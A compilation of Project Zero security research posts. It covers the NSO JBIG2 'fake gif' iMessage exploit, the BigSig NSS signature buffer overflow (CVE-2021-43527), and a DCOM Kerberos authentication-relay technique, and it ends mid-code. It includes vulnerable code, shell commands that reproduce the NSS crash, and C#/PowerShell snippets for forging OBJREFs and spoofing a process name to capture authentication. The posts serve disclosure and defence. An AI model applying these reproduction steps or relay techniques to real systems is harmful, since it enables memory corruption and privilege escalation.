Looking at the selector name, the intention here was probably to just copy the GIF file before editing the loop count field, but the semantics of this method are different. Under the hood it uses the CoreGraphics APIs to render the source image to a new GIF file at the destination path. And just because the source filename has to end in .gif, that doesn't mean it's really a GIF file.

The ImageIO library, as detailed in a previous Project Zero blogpost, is used to guess the correct format of the source file and parse it, completely ignoring the file extension. Using this "fake gif" trick, over 20 image codecs are suddenly part of the iMessage zero-click attack surface, including some very obscure and complex formats, remotely exposing probably hundreds of thousands of lines of code.

Note: Apple inform us that they have restricted the available ImageIO formats reachable from IMTranscoderAgent starting in iOS 14.8.1 (26 October 2021), and completely removed the GIF code path from IMTranscoderAgent starting in iOS 15.0 (20 September 2021), with GIF decoding taking place entirely within BlastDoor.

A PDF in your GIF

NSO uses the "fake gif" trick to target a vulnerability in the CoreGraphics PDF parser.

PDF was a popular target for exploitation around a decade ago, due to its ubiquity and complexity. Plus, the availability of javascript inside PDFs made development of reliable exploits far easier. The CoreGraphics PDF parser doesn't seem to interpret javascript, but NSO managed to find something equally powerful inside the CoreGraphics PDF parser...

Extreme compression

In the late 1990's, bandwidth and storage were much more scarce than they are now. It was in that environment that the JBIG2 standard emerged. JBIG2 is a domain specific image codec designed to compress images where pixels can only be black or white.

It was developed to achieve extremely high compression ratios for scans of text documents and was implemented and used in high-end office scanner/printer devices like the XEROX WorkCenter device shown below. If you used the scan to pdf functionality of a device like this a decade ago, your PDF likely had a JBIG2 stream in it.

A Xerox WorkCentre 7500 series multifunction printer, which used JBIG2

for its scan-to-pdf functionality

source: https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7545-7556/specifications

The PDFs files produced by those scanners were exceptionally small, perhaps only a few kilobytes. There are two novel techniques which JBIG2 uses to achieve these extreme compression ratios which are relevant to this exploit:

Technique 1: Segmentation and substitution

Effectively every text document, especially those written in languages with small alphabets like English or German, consists of many repeated letters (also known as glyphs) on each page. JBIG2 tries to segment each page into glyphs then uses simple pattern matching to match up glyphs which look the same:

Simple pattern matching can find all the shapes which look similar on a page,

in this case all the 'e's

JBIG2 doesn't actually know anything about glyphs and it isn't doing OCR (optical character recognition.) A JBIG encoder is just looking for connected regions of pixels and grouping similar looking regions together. The compression algorithm is to simply substitute all sufficiently-similar looking regions with a copy of just one of them:

Replacing all occurrences of similar glyphs with a copy of just one often yields a document which is still quite legible and enables very high compression ratios

In this case the output is perfectly readable but the amount of information to be stored is significantly reduced. Rather than needing to store all the original pixel information for the whole page you only need a compressed version of the "reference glyph" for each character and the relative coordinates of all the places where copies should be made. The decompression algorithm then treats the output page like a canvas and "draws" the exact same glyph at all the stored locations.

There's a significant issue with such a scheme: it's far too easy for a poor encoder to accidentally swap similar looking characters, and this can happen with interesting consequences. D. Kriesel's blog has some motivating examples where PDFs of scanned invoices have different figures or PDFs of scanned construction drawings end up with incorrect measurements. These aren't the issues we're looking at, but they are one significant reason why JBIG2 is not a common compression format anymore.

Technique 2: Refinement coding

As mentioned above, the substitution based compression output is lossy. After a round of compression and decompression the rendered output doesn't look exactly like the input. But JBIG2 also supports lossless compression as well as an intermediate "less lossy" compression mode.

It does this by also storing (and compressing) the difference between the substituted glyph and each original glyph. Here's an example showing a difference mask between a substituted character on the left and the original lossless character in the middle:

Using the XOR operator on bitmaps to compute a difference image

In this simple example the encoder can store the difference mask shown on the right, then during decompression the difference mask can be XORed with the substituted character to recover the exact pixels making up the original character. There are some more tricks outside of the scope of this blog post to further compress that difference mask using the intermediate forms of the substituted character as a "context" for the compression.

Rather than completely encoding the entire difference in one go, it can be done in steps, with each iteration using a logical operator (one of AND, OR, XOR or XNOR) to set, clear or flip bits. Each successive refinement step brings the rendered output closer to the original and this allows a level of control over the "lossiness" of the compression. The implementation of these refinement coding steps is very flexible and they are also able to "read" values already present on the output canvas.

A JBIG2 stream

Most of the CoreGraphics PDF decoder appears to be Apple proprietary code, but the JBIG2 implementation is from Xpdf, the source code for which is freely available.

The JBIG2 format is a series of segments, which can be thought of as a series of drawing commands which are executed sequentially in a single pass. The CoreGraphics JBIG2 parser supports 19 different segment types which include operations like defining a new page, decoding a huffman table or rendering a bitmap to given coordinates on the page.

Segments are represented by the class JBIG2Segment and its subclasses JBIG2Bitmap and JBIG2SymbolDict.

A JBIG2Bitmap represents a rectangular array of pixels. Its data field points to a backing-buffer containing the rendering canvas.

A JBIG2SymbolDict groups JBIG2Bitmaps together. The destination page is represented as a JBIG2Bitmap, as are individual glyphs.

JBIG2Segments can be referred to by a segment number and the GList vector type stores pointers to all the JBIG2Segments. To look up a segment by segment number the GList is scanned sequentially.

The vulnerability

The vulnerability is a classic integer overflow when collating referenced segments:

  Guint numSyms; // (1)

  numSyms = 0;

  for (i = 0; i < nRefSegs; ++i) {

    if ((seg = findSegment(refSegs[i]))) {

      if (seg->getType() == jbig2SegSymbolDict) {

        numSyms += ((JBIG2SymbolDict *)seg)->getSize();  // (2)

      } else if (seg->getType() == jbig2SegCodeTable) {

        codeTables->append(seg);

      }

    } else {

      error(errSyntaxError, getPos(),

            "Invalid segment reference in JBIG2 text region");

      delete codeTables;

      return;

    }

  }

...

  // get the symbol bitmaps

  syms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *)); // (3)

  kk = 0;

  for (i = 0; i < nRefSegs; ++i) {

    if ((seg = findSegment(refSegs[i]))) {

      if (seg->getType() == jbig2SegSymbolDict) {

        symbolDict = (JBIG2SymbolDict *)seg;

        for (k = 0; k < symbolDict->getSize(); ++k) {

          syms[kk++] = symbolDict->getBitmap(k); // (4)

        }

      }

    }

  }

numSyms is a 32-bit integer declared at (1). By supplying carefully crafted reference segments it's possible for the repeated addition at (2) to cause numSyms to overflow to a controlled, small value.

That smaller value is used for the heap allocation size at (3) meaning syms points to an undersized buffer.

Inside the inner-most loop at (4) JBIG2Bitmap pointer values are written into the undersized syms buffer.

Without another trick this loop would write over 32GB of data into the undersized syms buffer, certainly causing a crash. To avoid that crash the heap is groomed such that the first few writes off of the end of the syms buffer corrupt the GList backing buffer. This GList stores all known segments and is used by the findSegments routine to map from the segment numbers passed in refSegs to JBIG2Segment pointers. The overflow causes the JBIG2Segment pointers in the GList to be overwritten with JBIG2Bitmap pointers at (4).

Conveniently since JBIG2Bitmap inherits from JBIG2Segment the seg->getType() virtual call succeed even on devices where Pointer Authentication is enabled (which is used to perform a weak type check on virtual calls) but the returned type will now not be equal to jbig2SegSymbolDict thus causing further writes at (4) to not be reached and bounding the extent of the memory corruption.

A simplified view of the memory layout when the heap overflow occurs showing the undersized-buffer below the GList backing buffer and the JBIG2Bitmap

Boundless unbounding

Directly after the corrupted segments GList, the attacker grooms the JBIG2Bitmap object which represents the current page (the place to where current drawing commands render).

JBIG2Bitmaps are simple wrappers around a backing buffer, storing the buffer’s width and height (in bits) as well as a line value which defines how many bytes are stored for each line.

The memory layout of the JBIG2Bitmap object showing the segnum, w, h and line fields which are corrupted during the overflow

By carefully structuring refSegs they can stop the overflow after writing exactly three more JBIG2Bitmap pointers after the end of the segments GList buffer. This overwrites the vtable pointer and the first four fields of the JBIG2Bitmap representing the current page. Due to the nature of the iOS address space layout these pointers are very likely to be in the second 4GB of virtual memory, with addresses between 0x100000000 and 0x1ffffffff. Since all iOS hardware is little endian (meaning that the w and line fields are likely to be overwritten with 0x1 — the most-significant half of a JBIG2Bitmap pointer) and the segNum and h fields are likely to be overwritten with the least-significant half of such a pointer, a fairly random value depending on heap layout and ASLR somewhere between 0x100000 and 0xffffffff.

This gives the current destination page JBIG2Bitmap an unknown, but very large, value for h. Since that h value is used for bounds checking and is supposed to reflect the allocated size of the page backing buffer, this has the effect of "unbounding" the drawing canvas. This means that subsequent JBIG2 segment commands can read and write memory outside of the original bounds of the page backing buffer.

The heap groom also places the current page's backing buffer just below the undersized syms buffer, such that when the page JBIG2Bitmap is unbounded, it's able to read and write its own fields:


The memory layout showing how the unbounded bitmap backing buffer is able to reference the JBIG2Bitmap object and modify fields in it as it is located after the backing buffer in memory

By rendering 4-byte bitmaps at the correct canvas coordinates they can write to all the fields of the page JBIG2Bitmap and by carefully choosing new values for w, h and line, they can write to arbitrary offsets from the page backing buffer.

At this point it would also be possible to write to arbitrary absolute memory addresses if you knew their offsets from the page backing buffer. But how to compute those offsets? Thus far, this exploit has proceeded in a manner very similar to a "canonical" scripting language exploit which in Javascript might end up with an unbounded ArrayBuffer object with access to memory. But in those cases the attacker has the ability to run arbitrary Javascript which can obviously be used to compute offsets and perform arbitrary computations. How do you do that in a single-pass image parser?

My other compression format is turing-complete!

As mentioned earlier, the sequence of steps which implement JBIG2 refinement are very flexible. Refinement steps can reference both the output bitmap and any previously created segments, as well as render output to either the current page or a segment. By carefully crafting the context-dependent part of the refinement decompression, it's possible to craft sequences of segments where only the refinement combination operators have any effect.

In practice this means it is possible to apply the AND, OR, XOR and XNOR logical operators between memory regions at arbitrary offsets from the current page's JBIG2Bitmap backing buffer. And since that has been unbounded… it's possible to perform those logical operations on memory at arbitrary out-of-bounds offsets:

The memory layout showing how logical operators can be applied out-of-bounds

It's when you take this to its most extreme form that things start to get really interesting. What if rather than operating on glyph-sized sub-rectangles you instead operated on single bits?

You can now provide as input a sequence of JBIG2 segment commands which implement a sequence of logical bit operations to apply to the page. And since the page buffer has been unbounded those bit operations can operate on arbitrary memory.

With a bit of back-of-the-envelope scribbling you can convince yourself that with just the available AND, OR, XOR and XNOR logical operators you can in fact compute any computable function - the simplest proof being that you can create a logical NOT operator by XORing with 1 and then putting an AND gate in front of that to form a NAND gate:

An AND gate connected to one input of an XOR gate. The other XOR gate input is connected to the constant value 1 creating an NAND.

A NAND gate is an example of a universal logic gate; one from which all other gates can be built and from which a circuit can be built to compute any computable function.

Practical circuits

JBIG2 doesn't have scripting capabilities, but when combined with a vulnerability, it does have the ability to emulate circuits of arbitrary logic gates operating on arbitrary memory. So why not just use that to build your own computer architecture and script that!? That's exactly what this exploit does. Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.

The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.

In a future post (currently being finished), we'll take a look at exactly how they escape the IMTranscoderAgent sandbox.

This shouldn't have happened: A vulnerability postmortem

By: Ryan
1 December 2021 at 18:38

Posted by Tavis Ormandy, Project Zero

Introduction

This is an unusual blog post. I normally write posts to highlight some hidden attack surface or interesting complex vulnerability class. This time, I want to talk about a vulnerability that is neither of those things. The striking thing about this vulnerability is just how simple it is. This should have been caught earlier, and I want to explore why that didn’t happen.

In 2021, all good bugs need a catchy name, so I’m calling this one “BigSig”.

First, let’s take a look at the bug, I’ll explain how I found it and then try to understand why we missed it for so long.

Analysis

Network Security Services (NSS) is Mozilla's widely used, cross-platform cryptography library. When you verify an ASN.1 encoded digital signature, NSS will create a VFYContext structure to store the necessary data. This includes things like the public key, the hash algorithm, and the signature itself.

struct VFYContextStr {

   SECOidTag hashAlg; /* the hash algorithm */

   SECKEYPublicKey *key;

   union {

       unsigned char buffer[1];

       unsigned char dsasig[DSA_MAX_SIGNATURE_LEN];

       unsigned char ecdsasig[2 * MAX_ECKEY_LEN];

       unsigned char rsasig[(RSA_MAX_MODULUS_BITS + 7) / 8];

   } u;

   unsigned int pkcs1RSADigestInfoLen;

   unsigned char *pkcs1RSADigestInfo;

   void *wincx;

   void *hashcx;

   const SECHashObject *hashobj;

   SECOidTag encAlg;    /* enc alg */

   PRBool hasSignature;

   SECItem *params;

};

Fig 1. The VFYContext structure from NSS.


The maximum size signature that this structure can handle is whatever the largest union member is, in this case that’s RSA at
2048 bytes. That’s 16384 bits, large enough to accommodate signatures from even the most ridiculously oversized keys.

Okay, but what happens if you just....make a signature that’s bigger than that?

Well, it turns out the answer is memory corruption. Yes, really.


The untrusted signature is simply copied into this fixed-sized buffer, overwriting adjacent members with arbitrary attacker-controlled data.

The bug is simple to reproduce and affects multiple algorithms. The easiest to demonstrate is RSA-PSS. In fact, just these three commands work:

# We need 16384 bits to fill the buffer, then 32 + 64 + 64 + 64 bits to overflow to hashobj,

# which contains function pointers (bigger would work too, but takes longer to generate).

$ openssl genpkey -algorithm rsa-pss -pkeyopt rsa_keygen_bits:$((16384 + 32 + 64 + 64 + 64)) -pkeyopt rsa_keygen_primes:5 -out bigsig.key

# Generate a self-signed certificate from that key

$ openssl req -x509 -new -key bigsig.key -subj "/CN=BigSig" -sha256 -out bigsig.cer

# Verify it with NSS...

$ vfychain -a bigsig.cer

Segmentation fault

Fig 2. Reproducing the BigSig vulnerability in three easy commands.

The actual code that does the corruption varies based on the algorithm; here is the code for RSA-PSS. The bug is that there is simply no bounds checking at all; sig and key are  arbitrary-length, attacker-controlled blobs, and cx->u is a fixed-size buffer.

           case rsaPssKey:

               sigLen = SECKEY_SignatureLen(key);

               if (sigLen == 0) {

                   /* error set by SECKEY_SignatureLen */

                   rv = SECFailure;

                   break;

               }

               if (sig->len != sigLen) {

                   PORT_SetError(SEC_ERROR_BAD_SIGNATURE);

                   rv = SECFailure;

                   break;

               }

               PORT_Memcpy(cx->u.buffer, sig->data, sigLen);

               break;

Fig 3. The signature size must match the size of the key, but there are no other limitations. cx->u is a fixed-size buffer, and sig is an arbitrary-length, attacker-controlled blob.

I think this vulnerability raises a few immediate questions:

  • Was this a recent code change or regression that hadn’t been around long enough to be discovered? No, the original code was checked in with ECC support on the 17th October 2003, but wasn't exploitable until some refactoring in June 2012. In 2017, RSA-PSS support was added and made the same error.

  • Does this bug require a long time to generate a key that triggers the bug? No, the example above generates a real key and signature, but it can just be garbage as the overflow happens before the signature check. A few kilobytes of A’s works just fine.

  • Does reaching the vulnerable code require some complicated state that fuzzers and static analyzers would have difficulty synthesizing, like hashes or checksums? No, it has to be well-formed DER, that’s about it.

  • Is this an uncommon code path? No, Firefox does not use this code path for RSA-PSS signatures, but the default entrypoint for certificate verification in NSS, CERT_VerifyCertificate(), is vulnerable.

  • Is it specific to the RSA-PSS algorithm? No, it also affects DSA signatures.

  • Is it unexploitable, or otherwise limited impact? No, the hashobj member can be clobbered. That object contains function pointers, which are used immediately.

This wasn’t a process failure, the vendor did everything right. Mozilla has a mature, world-class security team. They pioneered bug bounties, invest in memory safety, fuzzing and test coverage.

NSS was one of the very first projects included with oss-fuzz, it was officially supported since at least October 2014. Mozilla also fuzz NSS themselves with libFuzzer, and have contributed their own mutator collection and distilled coverage corpus. There is an extensive testsuite, and nightly ASAN builds.

I'm generally skeptical of static analysis, but this seems like a simple missing bounds check that should be easy to find. Coverity has been monitoring NSS since at least December 2008, and also appears to have failed to discover this.

Until 2015, Google Chrome used NSS, and maintained their own testsuite and fuzzing infrastructure independent of Mozilla. Today, Chrome platforms use BoringSSL, but the NSS port is still maintained.

  • Did Mozilla have good test coverage for the vulnerable areas? YES.
  • Did Mozilla/chrome/oss-fuzz have relevant inputs in their fuzz corpus? YES.
  • Is there a mutator capable of extending ASN1_ITEMs? YES.
  • Is this an intra-object overflow, or other form of corruption that ASAN would have difficulty detecting? NO, it's a textbook buffer overflow that ASAN can easily detect.

How did I find the bug?

I've been experimenting with alternative methods for measuring code coverage, to see if any have any practical use in fuzzing. The fuzzer that discovered this vulnerability used a combination of two approaches, stack coverage and object isolation.

Stack Coverage

The most common method of measuring code coverage is block coverage, or edge coverage when source code is available. I’ve been curious if that is always sufficient. For example, consider a simple dispatch table with a combination of trusted and untrusted parameters, as in Fig 4.

#include <stdio.h>

#include <string.h>

#include <limits.h>

 

static char buf[128];

 

void cmd_handler_foo(int a, size_t b) { memset(buf, a, b); }

void cmd_handler_bar(int a, size_t b) { cmd_handler_foo('A', sizeof buf); }

void cmd_handler_baz(int a, size_t b) { cmd_handler_bar(a, sizeof buf); }

 

typedef void (* dispatch_t)(int, size_t);

 

dispatch_t handlers[UCHAR_MAX] = {

    cmd_handler_foo,

    cmd_handler_bar,

    cmd_handler_baz,

};

 

int main(int argc, char **argv)

{

    int cmd;

 

    while ((cmd = getchar()) != EOF) {

        if (handlers[cmd]) {

            handlers[cmd](getchar(), getchar());

        }

    }

}

Fig 4. The coverage of command bar is a superset of command foo, so an input containing the latter would be discarded during corpus minimization. There is a vulnerability unreachable via command bar that might never be discovered. Stack coverage would correctly keep both inputs.[1]

To solve this problem, I’ve been experimenting with monitoring the call stack during execution.

The naive implementation is too slow to be practical, but after a lot of optimization I had come up with a library that was fast enough to be integrated into coverage-guided fuzzing, and was testing how it performed with NSS and other libraries.

Object Isolation

Many data types are constructed from smaller records. PNG files are made of chunks, PDF files are made of streams, ELF files are made of sections, and X.509 certificates are made of ASN.1 TLV items. If a fuzzer has some understanding of the underlying format, it can isolate these records and extract the one(s) causing some new stack trace to be found.

The fuzzer I was using is able to isolate and extract interesting new ASN.1 OIDs, SEQUENCEs, INTEGERs, and so on. Once extracted, it can then randomly combine or insert them into template data. This isn’t really a new idea, but is a new implementation. I'm planning to open source this code in the future.

Do these approaches work?

I wish that I could say that discovering this bug validates my ideas, but I’m not sure it does. I was doing some moderately novel fuzzing, but I see no reason this bug couldn’t have been found earlier with even rudimentary fuzzing techniques.

Lessons Learned

How did extensive, customized fuzzing with impressive coverage metrics fail to discover this bug?

What went wrong

Issue #1 Missing end-to-end testing.

NSS is a modular library. This layered design is reflected in the fuzzing approach, as each component is fuzzed independently. For example, the QuickDER decoder is tested extensively, but the fuzzer simply creates and discards objects and never uses them.

extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {

 char *dest[2048];

 for (auto tpl : templates) {

   PORTCheapArenaPool pool;

   SECItem buf = {siBuffer, const_cast<unsigned char *>(Data),

                  static_cast<unsigned int>(Size)};

   PORT_InitCheapArena(&pool, DER_DEFAULT_CHUNKSIZE);

   (void)SEC_QuickDERDecodeItem(&pool.arena, dest, tpl, &buf);

   PORT_DestroyCheapArena(&pool);

 }

Fig 5. The QuickDER fuzzer simply creates and discards objects. This verifies the ASN.1 parsing, but not whether other components handle the resulting objects correctly.

This fuzzer might have produced a SECKEYPublicKey that could have reached the vulnerable code, but as the result was never used to verify a signature, the bug could never be discovered.

Issue #2 Arbitrary size limits.

There is an arbitrary limit of 10000 bytes placed on fuzzed input. There is no such limit within NSS; many structures can exceed this size. This vulnerability demonstrates that errors happen at extremes, so this limit should be chosen thoughtfully.

A reasonable choice might be 224-1 bytes, the largest possible certificate that can be presented by a server during a TLS handshake negotiation.

While NSS might handle objects even larger than this, TLS cannot possibly be involved, reducing the overall severity of any vulnerabilities missed.

Issue #3 Misleading metrics.

All of the NSS fuzzers are represented in combined coverage metrics by oss-fuzz, rather than their individual coverage. This data proved misleading, as the vulnerable code is fuzzed extensively but by fuzzers that could not possibly generate a relevant input.

This is because fuzzers like the tls_server_target use fixed, hardcoded certificates. This exercises code relevant to certificate verification, but only fuzzes TLS messages and protocol state changes.

What Worked

  • The design of the mozilla::pkix validation library prevented this bug from being worse than it could have been. Unfortunately it is unused outside of Firefox and Thunderbird.

It’s debatable whether this was just good fortune or not. It seems likely RSA-PSS would eventually be permitted by mozilla::pkix, even though it was not today.

Recommendations

This issue demonstrates that even extremely well-maintained C/C++ can have fatal, trivial mistakes.

Short Term

  • Raise the maximum size of ASN.1 objects produced by libFuzzer from 10,000 to 224-1 = 16,777,215  bytes.
  • The QuickDER fuzzer should call some relevant APIs with any objects successfully created before destroying them.
  • The oss-fuzz code coverage metrics should be divided by fuzzer, not by project.

Solution

This vulnerability is CVE-2021-43527, and is resolved in NSS 3.73.0. If you are a vendor that distributes NSS in your products, you will most likely need to update or backport the patch.

Credits

I would not have been able to find this bug without assistance from my colleagues from Chrome, Ryan Sleevi and David Benjamin, who helped answer my ASN.1 encoding questions and engaged in thoughtful discussion on the topic.

Thanks to the NSS team, who helped triage and analyze the vulnerability.


[1] In this minimal example, a workaround if source was available would be to use a combination of sancov's data-flow instrumentation options, but that also fails on more complex variants.

Windows Exploitation Tricks: Relaying DCOM Authentication

By: Ryan
20 October 2021 at 16:38

Posted by James Forshaw, Project Zero

In my previous blog post I discussed the possibility of relaying Kerberos authentication from a DCOM connection. I was originally going to provide a more in-depth explanation of how that works, but as it's quite involved I thought it was worthy of its own blog post. This is primarily a technique to get relay authentication from another user on the same machine and forward that to a network service such as LDAP. You could use this to escalate privileges on a host using a technique similar to a blog post from Shenanigans Labs but removing the requirement for the WebDAV service. Let's get straight to it.

Background

The technique to locally relay authentication for DCOM was something I originally reported back in 2015 (issue 325). This issue was fixed as CVE-2015-2370, however the underlying authentication relay using DCOM remained. This was repurposed and expanded upon by various others for local and remote privilege escalation in the RottenPotato series of exploits, the latest in that line being RemotePotato which is currently unpatched as of October 2021.

The key feature that the exploit abused is standard COM marshaling. Specifically when a COM object is marshaled so that it can be used by a different process or host, the COM runtime generates an OBJREF structure, most commonly the OBJREF_STANDARD form. This structure contains all the information necessary to establish a connection between a COM client and the original object in the COM server.

Connecting to the original object from the OBJREF is a two part process:

  1. The client extracts the Object Exporter ID (OXID) from the structure and contacts the OXID resolver service specified by the RPC binding information in the OBJREF.
  2. The client uses the OXID resolver service to find the RPC binding information of the COM server which hosts the object and establishes a connection to the RPC endpoint to access the object's interfaces.

Both of these steps require establishing an MSRPC connection to an endpoint. Commonly this is either locally over ALPC, or remotely via TCP. If a TCP connection is used then the client will also authenticate to the RPC server using NTLM or Kerberos based on the security bindings in the OBJREF.

The first key insight I had for issue 325 is that you can construct an OBJREF which will always establish a connection to the OXID resolver service over TCP, even if the service was on the local machine. To do this you specify the hostname as an IP address and an arbitrary TCP port for the client to connect to. This allows you to listen locally and when the RPC connection is made the authentication can be relayed or repurposed.

This isn't yet a privilege escalation, since you need to convince a privileged user to unmarshal the OBJREF. This was the second key insight: you could get a privileged service to unmarshal an arbitrary OBJREF easily using the CoGetInstanceFromIStorage API and activating a privileged COM service. This marshals a COM object, creates the privileged COM server and then unmarshals the object in the server's security context. This results in an RPC call to the fake OXID resolver authenticated using a privileged user's credentials. From there the authentication could be relayed to the local system for privilege escalation.

Diagram of an DCOM authentication relay attack from issue 325

Being able to redirect the OXID resolver RPC connection locally to a different TCP port was not by design and Microsoft eventually fixed this in Windows 10 1809/Server 2019. The underlying issue prior to Windows 10 1809 was the string containing the host returned as part of the OBJREF was directly concatenated into an RPC string binding. Normally the RPC string binding should have been in the form of:

ncacn_ip_tcp:ADDRESS[135]

Where ncacn_ip_tcp is the protocol sequence for RPC over TCP, ADDRESS is the target address which would come from the string binding, and [135] is the well-known TCP port for the OXID resolver appended by RPCSS. However, as the ADDRESS value is inserted manually into the binding then the OBJREF could specify its own port, resulting in the string binding:

ncacn_ip_tcp:ADDRESS[9999][135]

The RPC runtime would just pick the first port in the binding string to connect to, in this case 9999, and would ignore the second port 135. This behavior was fixed by calling the RpcStringBindingCompose API which will correctly escape the additional port number which ensures it's ignored when making the RPC connection.

This is where the RemotePotato exploit, developed by Antonio Cocomazzi and Andrea Pierini, comes into the picture. While it was no longer possible to redirect the OXID resolving to a local TCP server, you could redirect the initial connection to an external server. A call is made to the IObjectExporter::ResolveOxid2 method which can return an arbitrary RPC binding string for a fake COM object.

Unlike the OXID resolver binding string, the one for the COM object is allowed to contain an arbitrary TCP port. By returning a binding string for the original host on an arbitrary TCP port, the second part of the connection process can be relayed rather than the first. The relayed authentication can then be sent to a domain server, such as LDAP or SMB, as long as they don't enforce signing.

Diagram of an DCOM authentication relay attack from Remote Potato

This exploit has the clear disadvantage of requiring an external machine to act as the target of the initial OXID resolving. While investigating the Kerberos authentication relay attacks for DCOM, could I find a way to do everything on the same machine?

Remote ➜ Local Potato

If we're relaying the authentication for the second RPC connection, could we get the local OXID resolver to do the work for us and resolve to a local COM server on a randomly selected port? One of my goals is to write the least amount of code, which is why we'll do everything in C# and .NET.

byte[] ba = GetMarshalledObject(new object());

var std = COMObjRefStandard.FromArray(ba);

Console.WriteLine("IPID: {0}", std.Ipid);

Console.WriteLine("OXID: {0:X08}", std.Oxid);

Console.WriteLine("OID : {0:X08}", std.Oid);

std.StringBindings.Clear();

std.StringBindings.Add(RpcTowerId.Tcp, "127.0.0.1");

Console.WriteLine($"objref:{0}:", Convert.ToBase64String(std.ToArray());

This code creates a basic .NET object and COM marshals it to a standard OBJREF. I've left out the code for the marshalling and parsing of the OBJREF, but much of that is already present in the linked issue 325. We then modify the list of string bindings to only include a TCP binding for 127.0.0.1, forcing the OXID resolver to use TCP. If you specify a computer's hostname then the OXID resolver will use ALPC instead. Note that the string bindings in the OBJREF are only for binding to the OXID resolver, not the COM server itself.

We can then convert the modified OBJREF into an objref moniker. This format is useful as it allows us to trivially unmarshal the object in another process by calling the Marshal::BindToMoniker API in .NET and passing the moniker string. For example to bind to the COM object in PowerShell you can run the following command:

[Runtime.InteropServices.Marshal]::BindToMoniker("objref:TUVP...:")

Immediately after binding to the moniker a firewall dialog is likely to appear as shown:

Firewall dialog for the COM server when a TCP binding is created

This is requesting the user to allow our COM server process access to listen on all network interfaces for incoming connections. This prompt only appears when the client tries to resolve the OXID as DCOM supports dynamic RPC endpoints. Initially when the COM server starts it only listens on ALPC, but the RPCSS service can ask the server to bind to additional endpoints.

This request is made through an internal RPC interface that every COM server implements for use by the RPCSS service. One of the functions on this interface is UseProtSeq, which requests that the COM server enables a TCP endpoint. When the COM server receives the UseProtSeq call it tries to bind a TCP server to all interfaces, which subsequently triggers the Windows Defender Firewall to prompt the user for access.

Enabling the firewall permission requires administrator privileges. However, as we only need to listen for connections via localhost we shouldn't need to modify the firewall so the dialog can be dismissed safely. However, going back to the COM client we'll see an error reported.

Exception calling "BindToMoniker" with "1" argument(s):

"The RPC server is unavailable. (Exception from HRESULT: 0x800706BA)"

If we allow our COM server executable through the firewall, the client is able to connect over TCP successfully. Clearly the firewall is affecting the behavior of the COM client in some way even though it shouldn't. Tracing through the unmarshalling process in the COM client, the error is being returned from RPCSS when trying to resolve the OXID's binding information. This would imply that no connection attempt is made, and RPCSS is detecting that the COM server wouldn't be allowed through the firewall and refusing to return any binding information for TCP.

Further digging into RPCSS led me to the following function:

BOOL IsPortOpen(LPWSTR ImageFileName, int PortNumber) {

  INetFwMgr* mgr;

 

  CoCreateInstance(CLSID_FwMgr, NULL, CLSCTX_INPROC_SERVER, 

                   IID_PPV_ARGS(&mgr));

  VARIANT Allowed;

  VARIANT Restricted;

  mgr->IsPortAllowed(ImageFileName, NET_FW_IP_VERSION_ANY, 

             PortNumber, NULL, NET_FW_IP_PROTOCOL_TCP,

             &Allowed, &Restricted);

  if (VT_BOOL != Allowed.vt)

    return FALSE;

  return Allowed.boolVal == VARIANT_TRUE;

}

This function uses the HNetCfg.FwMgr COM object, and calls INetFwMgr::IsPortAllowed to determine if the process is allowed to listen on the specified TCP port. This function is called for every TCP binding when enumerating the COM server's bindings to return to the client. RPCSS passes the full path to the COM server's executable and the listening TCP port. If the function returns FALSE then RPCSS doesn't consider it valid and won't add it to the list of potential bindings.

If the OXID resolving process doesn't have any binding at the end of the lookup process it will return the RPC_S_SERVER_UNAVAILABLE error and the COM client will fail to bind to the server. How can we get around this limitation without needing administrator privileges to allow our server through the firewall? We can convert this C++ code into a small PowerShell function to test the behavior of the function to see what would grant access.

function Test-IsPortOpen {

    param(

        [string]$Name,

        [int]$Port

    )

    $mgr = New-Object -ComObject "HNetCfg.FwMgr"

    $allow = $null

    $mgr.IsPortAllowed($Name, 2, $Port, "", 6, [ref]$allow, $null)

    $allow

}

foreach($f in $(ls "$env:WINDIR\system32\*.exe")) {    

    if (Test-IsPortOpen $f.FullName 12345) {

        Write-Host $f.Fullname

    }

}

This script enumerates all executable files in system32 and checks if they'd be allowed to connect to TCP port 12345. Normally the TCP port would be selected automatically, however the COM server can use the RpcServerUseProtseqEp API to pre-register a known TCP port for RPC communication, so we'll just pick port 12345.

The only executable in system32 that returns true from Test-IsPortOpen is svchost.exe. That makes some sense, the default firewall rules usually permit a limited number of services to be accessible through the firewall, the majority of which are hosted in a shared service process.

This check doesn't guarantee a COM server will be allowed through the firewall, just that it's potentially accessible in order to return a TCP binding string. As the connection will be via localhost we don't need to be allowed through the firewall, only that IsPortOpen thinks we could be open. How can we spoof the image filename?

The obvious trick would be to create a svchost.exe process and inject our own code in there. However, that is harder to achieve through pure .NET code and also injecting into an svchost executable is a bit of a red flag if something is monitoring for malicious code which might make the exploit unreliable. Instead, perhaps we can influence the image filename used by RPCSS?

Digging into the COM runtime, when a COM server registers itself with RPCSS it passes its own image filename as part of the registration information. The runtime gets the image filename through a call to GetModuleFileName, which gets the value from the ImagePathName field in the process parameters block referenced by the PEB.

We can modify this string in our own process to be anything we like, then when COM is initialized, that will be sent to RPCSS which will use it for the firewall check. Once the check passes, RPCSS will return the TCP string bindings for our COM server when unmarshalling the OBJREF and the client will be able to connect. This can all be done with only minor in-process modifications from .NET and no external servers required.

Capturing Authentication

At this point a new RPC connection will be made to our process to communicate with the marshaled COM object. During that process the COM client must authenticate, so we can capture and relay that authentication to another service locally or remotely. What's the best way to capture that authentication traffic?

Before we do anything we need to select what authentication we want to receive, and this will be reflected in the OBJREF's security bindings. As we're doing everything using the existing COM runtime we can register what RPC authentication services to use when calling CoInitializeSecurity in the COM server through the asAuthSvc parameter.

var svcs = new SOLE_AUTHENTICATION_SERVICE[] {

    new SOLE_AUTHENTICATION_SERVICE() {

      dwAuthnSvc = RpcAuthenticationType.Kerberos,

      pPrincipalName = "HOST/DC.domain.com"

    }

};

var str = SetProcessModuleName("System");

try

{

   CoInitializeSecurity(IntPtr.Zero, svcs.Length, svcs,

        IntPtr.Zero, AuthnLevel.RPC_C_AUTHN_LEVEL_DEFAULT,

